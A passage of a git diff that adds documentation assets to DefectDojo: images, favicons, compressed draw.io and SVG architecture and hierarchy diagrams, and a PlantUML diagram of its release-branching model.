+ +He can view metrics for a Product Type, such as \"Third Party Apps\" to +track his team\'s activity and follow up with Product teams who have +long-lived bugs. He can also look at all the Findings for which there is +a Risk Acceptance associated, and ensure that the proper documentation +or timeline has been provided for the Findings in question. + +If he wants to check on a particular team member\'s progress, he can +look at the Engineer Metrics dashboard under \"Additional Metrics\" for +that user. diff --git a/docs/static/favicons/android-chrome-192x192.png b/docs/static/favicons/android-chrome-192x192.png new file mode 100644 index 00000000000..98e2068cfe7 Binary files /dev/null and b/docs/static/favicons/android-chrome-192x192.png differ diff --git a/docs/static/favicons/android-chrome-512x512.png b/docs/static/favicons/android-chrome-512x512.png new file mode 100644 index 00000000000..1be974f428a Binary files /dev/null and b/docs/static/favicons/android-chrome-512x512.png differ diff --git a/docs/static/favicons/apple-touch-icon.png b/docs/static/favicons/apple-touch-icon.png new file mode 100644 index 00000000000..f363f9847bd Binary files /dev/null and b/docs/static/favicons/apple-touch-icon.png differ diff --git a/docs/static/favicons/favicon-16x16.png b/docs/static/favicons/favicon-16x16.png new file mode 100644 index 00000000000..ece078edec9 Binary files /dev/null and b/docs/static/favicons/favicon-16x16.png differ diff --git a/docs/static/favicons/favicon-32x32.png b/docs/static/favicons/favicon-32x32.png new file mode 100644 index 00000000000..78f958933ca Binary files /dev/null and b/docs/static/favicons/favicon-32x32.png differ diff --git a/docs/static/favicons/favicon.ico b/docs/static/favicons/favicon.ico new file mode 100644 index 00000000000..c85af05a2c1 Binary files /dev/null and b/docs/static/favicons/favicon.ico differ diff --git a/docs/static/images/10Security-logo.png b/docs/static/images/10Security-logo.png new file mode 100644 index 00000000000..1e48d9b2283 Binary files /dev/null and b/docs/static/images/10Security-logo.png differ diff --git a/docs/static/images/DD-Architecture.drawio b/docs/static/images/DD-Architecture.drawio new file mode 100644 index 00000000000..d7adcfb2153 --- /dev/null +++ b/docs/static/images/DD-Architecture.drawio @@ -0,0 +1 @@ +7Vtbc9o6EP41PJZBvgGPARKaaZLmJJmT9FHYwig1FpVlLv31R7Llq7gYysU9Q8hM0EqW5G+/lXZXSkPvT5dDCmeTR+Igr6G1nGVDHzQ0DRia1hC/LWcVSzqWHgtcih3ZKBO84t9ICltSGmIHBYWGjBCP4VlRaBPfRzYryCClZFFsNiZecdQZdJEieLWhp0rfscMmUgqsblbxFWF3IofuaO24YgqTxvJNggl0yCIn0m8bep8SwuJv02UfeQK8BJf4ubsNtenEKPJZlQd+Db7ffx1M6bfpYAjmd2/hJ11+kZOdQy+UL9zQLI/31xuJKbOVxMH6FYp59sbEZ1+CSEs3vAEfn2u6l9Xzb674O0Bjro0B+SRJf3xio6RWApL2rlES+g4SEwW8ejHBDL3OoC1qF5xXXDZhU09WQ2pLnhhiRtjz+sQjNOpJH5viI2cqm3Fg+FMedn1eoLGuenNEGeZ6vpFyRsQwAR8V+y4vm1npRao36TY3XPwjmjJKfqJcTS/6pC+b15NUnZgBWuZEUm9DRKaI0RVvktQmHFqVyouMku1ENsmx0UiEUJqBm/adMYV/kWTZgzhAIc7T8P7p4880m9MZsI4EnVWCzlKhA+ugs06GnKGAhBy+5sgioWxCXOJD7zaT9jIYBZezNg9E0DYC7xMxtpLowZCRIrRoidlH7vsP0VXTlKXBUvYcFVZJwefv+5E1FMUf+brssaiUPFdZjQEJqY22YCU3Dwapi9g2TOWmIoDcygqKPMjwvLi4H13FmmIc4fvr8L52xqHXzjh0BbkBZHAEA1R78Azj0uAZCnj8KRTN+Z3Qn4jWDkOztLHpF8fQ3IxhD0FWOwStTt0QtBQEFdBgMIt99TFeCux6M4J9hujtnAMRSLBSf1lsKQ4MJun2l0O06Hb5xBebpQdHyHsmAWaYCNfORqLznM/3UGowIoyR6UanMHEd03741GbiVaZLV0Q9Tfg7pKgZBlFlWcklB9UYiM9xlK91raLyVd0bbVX15qlU39mteuQ7NyIsy7S1xknJHJPU3djipDh3WEwzKgXcVWDJALYHgwDbiVg2W2eI+zpgmzwjsMMzOtwTAhUdnJzqzTVWn8gq+0FyhGdhoDnitUurTqtEqfh95FP5oLTUkQ66zW7+p+iPlMOX2BFUuo3ImoJwOH+7V/6eir9avfirlxzf9v+Cv0CNyrcROOPX0TgMqnP4UA4eL7qUwcbO6LJe3DWOxt1yR/qZ2aqGyQezdZ+0RmV+Okdg674r8/nZbdSM3e2maeYWVLPAUU3rNM3D6F5e8w1wZrqbKrvPl/crLudgq4FcPu8Hjk3e8+T9gJq+eoGjEWaP/yi6v3TioJx60S6eOACdixrIIYlxUDCPzFpObiDmpexj/dpqdkvxYHltrbpIKx2VcxWnXqTVEPB6rlXx0KOlQHc99agInRq3XfeN6uipccTVZitCpzosV5utCJ162vaIgkBcJ0pu0NDkvktPHFLQ2oFaQ1O+Hr/9MYQVzt92ZlU25/Nk0jufLFnn2R6cLhGlZ0QxB0OcpqW+974x7Ebd7nSZJX41yYfsmWD+W3J/mnrx8LpnV4TuGqJUgO4JeW/9Bzj/92X1+jgOPmwK3tZcWrz3McPQ4y9ev+25jN9ZLxitxW/NTlL3m4tnSNBso9rO3eboFxf/2gQNL2aX4ePm2b8U6Lf/AQ== \ No newline at end of file diff --git a/docs/static/images/DD-Architecture.svg b/docs/static/images/DD-Architecture.svg new file mode 100644 index 00000000000..4ebf0f92aee --- /dev/null +++ b/docs/static/images/DD-Architecture.svg @@ -0,0 +1,3 @@ + + +
    DefectDojo
    DefectDojo
    NGINX
    NGINX
    uWSGI
    uWSGI
    Database
    Database
    Celery Worker
    Celery Worker
    Celery Beat
    Celery Beat
    RabbitMQ
    RabbitMQ
    NGINX
    NGINX
    uWSGI
    uWSGI
    RabbitMQ
    RabbitMQ
    NGINX
    NGINX
    uWSGI
    uWSGI
    Message
    Broker
    Message...
    Celery Beat
    Celery Beat
    NGINX
    NGINX
    NGINX
    NGINX
    Initializer
    Initializer
    Viewer does not support full SVG 1.1
    \ No newline at end of file diff --git a/docs/static/images/DD-Hierarchy.drawio b/docs/static/images/DD-Hierarchy.drawio new file mode 100644 index 00000000000..319195b2ce9 --- /dev/null +++ b/docs/static/images/DD-Hierarchy.drawio @@ -0,0 +1 @@ +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 \ No newline at end of file diff --git a/docs/static/images/DD-Hierarchy.svg b/docs/static/images/DD-Hierarchy.svg new file mode 100644 index 00000000000..fccd8b83dc7 --- /dev/null +++ b/docs/static/images/DD-Hierarchy.svg @@ -0,0 +1,3 @@ + + +
    Product Type
    Product Type
    Product
    Product
    Product
    Product
    Engagement
    Engagement
    Engagement
    Engagement
    Engagement
    Engagement
    Test
    Test
    Test
    Test
    Test
    Test
    Test
    Test
    Test
    Test
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Finding
    Endpoint
    Endpoint
    Endpoint
    Endpoint
    Viewer does not support full SVG 1.1
    \ No newline at end of file diff --git a/docs/static/images/Linkedin-logo-icon-png.png b/docs/static/images/Linkedin-logo-icon-png.png new file mode 100644 index 00000000000..a6fc53783c1 Binary files /dev/null and b/docs/static/images/Linkedin-logo-icon-png.png differ diff --git a/docs/static/images/Twitter_Logo.png b/docs/static/images/Twitter_Logo.png new file mode 100644 index 00000000000..30dbb795532 Binary files /dev/null and b/docs/static/images/Twitter_Logo.png differ diff --git a/docs/static/images/WHP.png b/docs/static/images/WHP.png new file mode 100644 index 00000000000..0e657b56ea9 Binary files /dev/null and b/docs/static/images/WHP.png differ diff --git a/docs/static/images/XING_logo.png b/docs/static/images/XING_logo.png new file mode 100644 index 00000000000..b4f7f0579a4 Binary files /dev/null and b/docs/static/images/XING_logo.png differ diff --git a/docs/static/images/YouTube-Emblem.png b/docs/static/images/YouTube-Emblem.png new file mode 100644 index 00000000000..9a53d407ea5 Binary files /dev/null and b/docs/static/images/YouTube-Emblem.png differ diff --git a/docs/static/images/admin-creds.png b/docs/static/images/admin-creds.png new file mode 100644 index 00000000000..9565f250a72 Binary files /dev/null and b/docs/static/images/admin-creds.png differ diff --git a/docs/static/images/api_1.png b/docs/static/images/api_1.png new file mode 100644 index 00000000000..e4f4d11ee10 Binary files /dev/null and b/docs/static/images/api_1.png differ diff --git a/docs/static/images/api_2.png b/docs/static/images/api_2.png new file mode 100644 index 00000000000..92cf15d60d2 Binary files /dev/null and b/docs/static/images/api_2.png differ diff --git a/docs/static/images/api_3.png b/docs/static/images/api_3.png new file mode 100644 index 00000000000..ca9f43bb804 Binary files /dev/null and b/docs/static/images/api_3.png differ diff --git a/docs/static/images/api_v2_1.png b/docs/static/images/api_v2_1.png new file mode 100644 index 00000000000..7e9a8c22cbc Binary files /dev/null and b/docs/static/images/api_v2_1.png differ diff --git a/docs/static/images/api_v2_2.png b/docs/static/images/api_v2_2.png new file mode 100644 index 00000000000..7fa3e452303 Binary files /dev/null and b/docs/static/images/api_v2_2.png differ diff --git a/docs/static/images/api_v2_3.png b/docs/static/images/api_v2_3.png new file mode 100644 index 00000000000..beac58b0732 Binary files /dev/null and b/docs/static/images/api_v2_3.png differ diff --git a/docs/static/images/arrival.png b/docs/static/images/arrival.png new file mode 100644 index 00000000000..b186c4f4730 Binary files /dev/null and b/docs/static/images/arrival.png differ diff --git a/docs/static/images/branching_model.png b/docs/static/images/branching_model.png new file mode 100644 index 00000000000..fa9a07423ef Binary files /dev/null and b/docs/static/images/branching_model.png differ diff --git a/docs/static/images/branching_model.puml b/docs/static/images/branching_model.puml new file mode 100644 index 00000000000..6a1d2cd8ebf --- /dev/null +++ b/docs/static/images/branching_model.puml @@ -0,0 +1,46 @@ +@startuml +!pragma teoz true + +== Monthly release == +participant "Dev branch" as devbranch order 10 #LightBlue +participant "Release branch" as rlsbranch order 20 #YellowGreen +participant "Master branch" as master order 30 #99FF99 +'participant "Maintenance branch" as maintainbranch order 40 #YellowGreen + +{startrc} devbranch -> rlsbranch ++ #YellowGreen: Create branch "release/1.0.0" + +rlsbranch -> master: Merge +note right of master + Official release + - Tag "1.0.0" + - Push "1.0.0" to DockerHub +end note + +master --> devbranch: Merge master back to dev to re-align + +... ... + +== Maintenance/security releases == +master -> rlsbranch ++ #YellowGreen: Create branch "release/1.0.x" +note left of rlsbranch + Official release + - Tag "1.0.1" + - Push "1.0.1" to DockerHub +end note +rlsbranch -> master: Merge +master --> devbranch: Merge + +... ... + +master -> rlsbranch ++ #YellowGreen: Create branch "release/1.0.x" +note left of rlsbranch + Official release + - Tag "1.0.2" + - Push "1.0.2" to DockerHub +end note +rlsbranch -> master: Merge +master --> devbranch: Merge + +... ... + +@enduml diff --git a/docs/static/images/bug-2x.png b/docs/static/images/bug-2x.png new file mode 100644 index 00000000000..2279f41ab29 Binary files /dev/null and b/docs/static/images/bug-2x.png differ diff --git a/docs/static/images/burp_plugin_usage.gif b/docs/static/images/burp_plugin_usage.gif new file mode 100644 index 00000000000..7fe33da3668 Binary files /dev/null and b/docs/static/images/burp_plugin_usage.gif differ diff --git a/docs/static/images/cloudbees-logo.png b/docs/static/images/cloudbees-logo.png new file mode 100644 index 00000000000..71504e41066 Binary files /dev/null and b/docs/static/images/cloudbees-logo.png differ diff --git a/docs/static/images/configuration_permissions.png b/docs/static/images/configuration_permissions.png new file mode 100644 index 00000000000..6d586a66135 Binary files /dev/null and b/docs/static/images/configuration_permissions.png differ diff --git a/docs/static/images/dashboard.png b/docs/static/images/dashboard.png new file mode 100644 index 00000000000..454e53bd548 Binary files /dev/null and b/docs/static/images/dashboard.png differ diff --git a/docs/static/images/deduplication.png b/docs/static/images/deduplication.png new file mode 100644 index 00000000000..0fe929f1e31 Binary files /dev/null and b/docs/static/images/deduplication.png differ diff --git a/docs/static/images/dojo_tshirt_front.png b/docs/static/images/dojo_tshirt_front.png new file mode 100644 index 00000000000..8c803e003a2 Binary files /dev/null and b/docs/static/images/dojo_tshirt_front.png differ diff --git a/docs/static/images/end_1.png b/docs/static/images/end_1.png new file mode 100644 index 00000000000..a6ebfe7d49d Binary files /dev/null and b/docs/static/images/end_1.png differ diff --git a/docs/static/images/end_2.png b/docs/static/images/end_2.png new file mode 100644 index 00000000000..1224fa2dd84 Binary files /dev/null and b/docs/static/images/end_2.png differ diff --git a/docs/static/images/end_3.png b/docs/static/images/end_3.png new file mode 100644 index 00000000000..590ecb94719 Binary files /dev/null and b/docs/static/images/end_3.png differ diff --git a/docs/static/images/eng_1.png b/docs/static/images/eng_1.png new file mode 100644 index 00000000000..d92379caafc Binary files /dev/null and b/docs/static/images/eng_1.png differ diff --git a/docs/static/images/eng_2.png b/docs/static/images/eng_2.png new file mode 100644 index 00000000000..1dae9ef9e15 Binary files /dev/null and b/docs/static/images/eng_2.png differ diff --git a/docs/static/images/engagement_risk_acceptance.png b/docs/static/images/engagement_risk_acceptance.png new file mode 100644 index 00000000000..566d1846284 Binary files /dev/null and b/docs/static/images/engagement_risk_acceptance.png differ diff --git a/docs/static/images/export_1.png b/docs/static/images/export_1.png new file mode 100644 index 00000000000..18f773a6639 Binary files /dev/null and b/docs/static/images/export_1.png differ diff --git a/docs/static/images/export_2.png b/docs/static/images/export_2.png new file mode 100644 index 00000000000..647bd5133d0 Binary files /dev/null and b/docs/static/images/export_2.png differ diff --git a/docs/static/images/favicon.ico b/docs/static/images/favicon.ico new file mode 100644 index 00000000000..b94b12053d7 Binary files /dev/null and b/docs/static/images/favicon.ico differ diff --git a/docs/static/images/find_1.png b/docs/static/images/find_1.png new file mode 100644 index 00000000000..16d175c2353 Binary files /dev/null and b/docs/static/images/find_1.png differ diff --git a/docs/static/images/find_2.png b/docs/static/images/find_2.png new file mode 100644 index 00000000000..8fc710e448d Binary files /dev/null and b/docs/static/images/find_2.png differ diff --git a/docs/static/images/find_3.png b/docs/static/images/find_3.png new file mode 100644 index 00000000000..199710d2d41 Binary files /dev/null and b/docs/static/images/find_3.png differ diff --git a/docs/static/images/find_4.png b/docs/static/images/find_4.png new file mode 100644 index 00000000000..e8fd41db461 Binary files /dev/null and b/docs/static/images/find_4.png differ diff --git a/docs/static/images/find_5.png b/docs/static/images/find_5.png new file mode 100644 index 00000000000..e39b2d2bdc8 Binary files /dev/null and b/docs/static/images/find_5.png differ diff --git a/docs/static/images/find_6.png b/docs/static/images/find_6.png new file mode 100644 index 00000000000..dad60b0a9df Binary files /dev/null and b/docs/static/images/find_6.png differ diff --git a/docs/static/images/finding_accepted.png b/docs/static/images/finding_accepted.png new file mode 100644 index 00000000000..133ccfcb447 Binary files /dev/null and b/docs/static/images/finding_accepted.png differ diff --git a/docs/static/images/gc_logo_2018.png b/docs/static/images/gc_logo_2018.png new file mode 100644 index 00000000000..d15bf81a479 Binary files /dev/null and b/docs/static/images/gc_logo_2018.png differ diff --git a/docs/static/images/getting_started_1.png b/docs/static/images/getting_started_1.png new file mode 100644 index 00000000000..d0ea187870f Binary files /dev/null and b/docs/static/images/getting_started_1.png differ diff --git a/docs/static/images/getting_started_10.png b/docs/static/images/getting_started_10.png new file mode 100644 index 00000000000..c25245e8514 Binary files /dev/null and b/docs/static/images/getting_started_10.png differ diff --git a/docs/static/images/getting_started_11.png b/docs/static/images/getting_started_11.png new file mode 100644 index 00000000000..3c235849146 Binary files /dev/null and b/docs/static/images/getting_started_11.png differ diff --git a/docs/static/images/getting_started_12.png b/docs/static/images/getting_started_12.png new file mode 100644 index 00000000000..1f5c5c93224 Binary files /dev/null and b/docs/static/images/getting_started_12.png differ diff --git a/docs/static/images/getting_started_13.png b/docs/static/images/getting_started_13.png new file mode 100644 index 00000000000..a968c8373b4 Binary files /dev/null and b/docs/static/images/getting_started_13.png differ diff --git a/docs/static/images/getting_started_14.png b/docs/static/images/getting_started_14.png new file mode 100644 index 00000000000..a40ff9e12be Binary files /dev/null and b/docs/static/images/getting_started_14.png differ diff --git a/docs/static/images/getting_started_15.png b/docs/static/images/getting_started_15.png new file mode 100644 index 00000000000..65e9b19ba52 Binary files /dev/null and b/docs/static/images/getting_started_15.png differ diff --git a/docs/static/images/getting_started_16.png b/docs/static/images/getting_started_16.png new file mode 100644 index 00000000000..19926803dc6 Binary files /dev/null and b/docs/static/images/getting_started_16.png differ diff --git a/docs/static/images/getting_started_17.png b/docs/static/images/getting_started_17.png new file mode 100644 index 00000000000..dd900c1dd33 Binary files /dev/null and b/docs/static/images/getting_started_17.png differ diff --git a/docs/static/images/getting_started_18.png b/docs/static/images/getting_started_18.png new file mode 100644 index 00000000000..547875ef982 Binary files /dev/null and b/docs/static/images/getting_started_18.png differ diff --git a/docs/static/images/getting_started_19.png b/docs/static/images/getting_started_19.png new file mode 100644 index 00000000000..1dc32f27998 Binary files /dev/null and b/docs/static/images/getting_started_19.png differ diff --git a/docs/static/images/getting_started_2.png b/docs/static/images/getting_started_2.png new file mode 100644 index 00000000000..a1ccc956f0f Binary files /dev/null and b/docs/static/images/getting_started_2.png differ diff --git a/docs/static/images/getting_started_20.png b/docs/static/images/getting_started_20.png new file mode 100644 index 00000000000..5a6abcac8b0 Binary files /dev/null and b/docs/static/images/getting_started_20.png differ diff --git a/docs/static/images/getting_started_21.png b/docs/static/images/getting_started_21.png new file mode 100644 index 00000000000..0d45cb1982a Binary files /dev/null and b/docs/static/images/getting_started_21.png differ diff --git a/docs/static/images/getting_started_22.png b/docs/static/images/getting_started_22.png new file mode 100644 index 00000000000..bc5e2d67397 Binary files /dev/null and b/docs/static/images/getting_started_22.png differ diff --git a/docs/static/images/getting_started_3.png b/docs/static/images/getting_started_3.png new file mode 100644 index 00000000000..61a3009c50a Binary files /dev/null and b/docs/static/images/getting_started_3.png differ diff --git a/docs/static/images/getting_started_4.png b/docs/static/images/getting_started_4.png new file mode 100644 index 00000000000..3000ab68949 Binary files /dev/null and b/docs/static/images/getting_started_4.png differ diff --git a/docs/static/images/getting_started_5.png b/docs/static/images/getting_started_5.png new file mode 100644 index 00000000000..72bbabe5621 Binary files /dev/null and b/docs/static/images/getting_started_5.png differ diff --git a/docs/static/images/getting_started_6.png b/docs/static/images/getting_started_6.png new file mode 100644 index 00000000000..2aa382b5415 Binary files /dev/null and b/docs/static/images/getting_started_6.png differ diff --git a/docs/static/images/getting_started_7.png b/docs/static/images/getting_started_7.png new file mode 100644 index 00000000000..e794c8f4037 Binary files /dev/null and b/docs/static/images/getting_started_7.png differ diff --git a/docs/static/images/getting_started_8.png b/docs/static/images/getting_started_8.png new file mode 100644 index 00000000000..98b7824e09b Binary files /dev/null and b/docs/static/images/getting_started_8.png differ diff --git a/docs/static/images/getting_started_9.png b/docs/static/images/getting_started_9.png new file mode 100644 index 00000000000..e62236d5b23 Binary files /dev/null and b/docs/static/images/getting_started_9.png differ diff --git a/docs/static/images/google_1.png b/docs/static/images/google_1.png new file mode 100644 index 00000000000..a56bf241e62 Binary files /dev/null and b/docs/static/images/google_1.png differ diff --git a/docs/static/images/google_2.png b/docs/static/images/google_2.png new file mode 100644 index 00000000000..ff0a792941e Binary files /dev/null and b/docs/static/images/google_2.png differ diff --git a/docs/static/images/google_3.png b/docs/static/images/google_3.png new file mode 100644 index 00000000000..39c7195482c Binary files /dev/null and b/docs/static/images/google_3.png differ diff --git a/docs/static/images/google_4.png b/docs/static/images/google_4.png new file mode 100644 index 00000000000..536665c71ed Binary files /dev/null and b/docs/static/images/google_4.png differ diff --git a/docs/static/images/google_5.png b/docs/static/images/google_5.png new file mode 100644 index 00000000000..ead1b36ab2a Binary files /dev/null and b/docs/static/images/google_5.png differ diff --git a/docs/static/images/google_sheets_sync_1.png b/docs/static/images/google_sheets_sync_1.png new file mode 100644 index 00000000000..88490d04331 Binary files /dev/null and b/docs/static/images/google_sheets_sync_1.png differ diff --git a/docs/static/images/google_sheets_sync_2.png b/docs/static/images/google_sheets_sync_2.png new file mode 100644 index 00000000000..93d97336262 Binary files /dev/null and b/docs/static/images/google_sheets_sync_2.png differ diff --git a/docs/static/images/google_sheets_sync_3.png b/docs/static/images/google_sheets_sync_3.png new file mode 100644 index 00000000000..5f7ca1e5d99 Binary files /dev/null and b/docs/static/images/google_sheets_sync_3.png differ diff --git a/docs/static/images/google_sheets_sync_4.png b/docs/static/images/google_sheets_sync_4.png new file mode 100644 index 00000000000..ec84179fad4 Binary files /dev/null and b/docs/static/images/google_sheets_sync_4.png differ diff --git a/docs/static/images/graph-2x.png b/docs/static/images/graph-2x.png new file mode 100644 index 00000000000..32a75cd8ad6 Binary files /dev/null and b/docs/static/images/graph-2x.png differ diff --git a/docs/static/images/imp_1.png b/docs/static/images/imp_1.png new file mode 100644 index 00000000000..2c9cbba274d Binary files /dev/null and b/docs/static/images/imp_1.png differ diff --git a/docs/static/images/imp_2.png b/docs/static/images/imp_2.png new file mode 100644 index 00000000000..43ec627d912 Binary files /dev/null and b/docs/static/images/imp_2.png differ diff --git a/docs/static/images/import_history1.png b/docs/static/images/import_history1.png new file mode 100644 index 00000000000..00019296407 Binary files /dev/null and b/docs/static/images/import_history1.png differ diff --git a/docs/static/images/import_history_details1.png b/docs/static/images/import_history_details1.png new file mode 100644 index 00000000000..2f5be91099b Binary files /dev/null and b/docs/static/images/import_history_details1.png differ diff --git a/docs/static/images/isaac.png b/docs/static/images/isaac.png new file mode 100644 index 00000000000..4d96b026ae1 Binary files /dev/null and b/docs/static/images/isaac.png differ diff --git a/docs/static/images/jira_issue_templates.png b/docs/static/images/jira_issue_templates.png new file mode 100644 index 00000000000..589713feeae Binary files /dev/null and b/docs/static/images/jira_issue_templates.png differ diff --git a/docs/static/images/key-2x.png b/docs/static/images/key-2x.png new file mode 100644 index 00000000000..006575ac80d Binary files /dev/null and b/docs/static/images/key-2x.png differ diff --git a/docs/static/images/languages_api.png b/docs/static/images/languages_api.png new file mode 100644 index 00000000000..5df5c3098e8 Binary files /dev/null and b/docs/static/images/languages_api.png differ diff --git a/docs/static/images/languages_ui.png b/docs/static/images/languages_ui.png new file mode 100644 index 00000000000..a046739d112 Binary files /dev/null and b/docs/static/images/languages_ui.png differ diff --git a/docs/static/images/logo.png b/docs/static/images/logo.png new file mode 100644 index 00000000000..747121dc3cf Binary files /dev/null and b/docs/static/images/logo.png differ diff --git a/docs/static/images/maibornwolff-logo.png b/docs/static/images/maibornwolff-logo.png new file mode 100644 index 00000000000..f4bd948630a Binary files /dev/null and b/docs/static/images/maibornwolff-logo.png differ diff --git a/docs/static/images/met_1.png b/docs/static/images/met_1.png new file mode 100644 index 00000000000..340c4424196 Binary files /dev/null and b/docs/static/images/met_1.png differ diff --git a/docs/static/images/met_2.png b/docs/static/images/met_2.png new file mode 100644 index 00000000000..2ea30d0c815 Binary files /dev/null and b/docs/static/images/met_2.png differ diff --git a/docs/static/images/met_3.png b/docs/static/images/met_3.png new file mode 100644 index 00000000000..107295e2153 Binary files /dev/null and b/docs/static/images/met_3.png differ diff --git a/docs/static/images/met_4.png b/docs/static/images/met_4.png new file mode 100644 index 00000000000..e6ebf0525b0 Binary files /dev/null and b/docs/static/images/met_4.png differ diff --git a/docs/static/images/met_5.png b/docs/static/images/met_5.png new file mode 100644 index 00000000000..57e3a130e23 Binary files /dev/null and b/docs/static/images/met_5.png differ diff --git a/docs/static/images/notifications_1.png b/docs/static/images/notifications_1.png new file mode 100644 index 00000000000..1995858bb8b Binary files /dev/null and b/docs/static/images/notifications_1.png differ diff --git a/docs/static/images/okta_1.png b/docs/static/images/okta_1.png new file mode 100644 index 00000000000..374a8ec45d7 Binary files /dev/null and b/docs/static/images/okta_1.png differ diff --git a/docs/static/images/okta_2.png b/docs/static/images/okta_2.png new file mode 100644 index 00000000000..054fd02f344 Binary files /dev/null and b/docs/static/images/okta_2.png differ diff --git a/docs/static/images/okta_3.png b/docs/static/images/okta_3.png new file mode 100644 index 00000000000..87440555ffd Binary files /dev/null and b/docs/static/images/okta_3.png differ diff --git a/docs/static/images/okta_4.png b/docs/static/images/okta_4.png new file mode 100644 index 00000000000..c73847d43c8 Binary files /dev/null and b/docs/static/images/okta_4.png differ diff --git a/docs/static/images/okta_5.png b/docs/static/images/okta_5.png new file mode 100644 index 00000000000..090ec5e168e Binary files /dev/null and b/docs/static/images/okta_5.png differ diff --git a/docs/static/images/okta_6.png b/docs/static/images/okta_6.png new file mode 100644 index 00000000000..4896e5a45e2 Binary files /dev/null and b/docs/static/images/okta_6.png differ diff --git a/docs/static/images/okta_7.png b/docs/static/images/okta_7.png new file mode 100644 index 00000000000..dd3f69286bf Binary files /dev/null and b/docs/static/images/okta_7.png differ diff --git a/docs/static/images/owasp_asvs.png b/docs/static/images/owasp_asvs.png new file mode 100644 index 00000000000..5c023ac1115 Binary files /dev/null and b/docs/static/images/owasp_asvs.png differ diff --git a/docs/static/images/owasp_asvs_level.png b/docs/static/images/owasp_asvs_level.png new file mode 100644 index 00000000000..37c146ef01b Binary files /dev/null and b/docs/static/images/owasp_asvs_level.png differ diff --git a/docs/static/images/owasp_asvs_menu.png b/docs/static/images/owasp_asvs_menu.png new file mode 100644 index 00000000000..3afaf31b06e Binary files /dev/null and b/docs/static/images/owasp_asvs_menu.png differ diff --git a/docs/static/images/owasp_asvs_score.png b/docs/static/images/owasp_asvs_score.png new file mode 100644 index 00000000000..c7468e77ba1 Binary files /dev/null and b/docs/static/images/owasp_asvs_score.png differ diff --git a/docs/static/images/prod-owner-creds.png b/docs/static/images/prod-owner-creds.png new file mode 100644 index 00000000000..b7a3abac092 Binary files /dev/null and b/docs/static/images/prod-owner-creds.png differ diff --git a/docs/static/images/product_1.png b/docs/static/images/product_1.png new file mode 100644 index 00000000000..93992762a74 Binary files /dev/null and b/docs/static/images/product_1.png differ diff --git a/docs/static/images/product_2.png b/docs/static/images/product_2.png new file mode 100644 index 00000000000..61afe6f8ba9 Binary files /dev/null and b/docs/static/images/product_2.png differ diff --git a/docs/static/images/product_3.png b/docs/static/images/product_3.png new file mode 100644 index 00000000000..bfd30f2ae32 Binary files /dev/null and 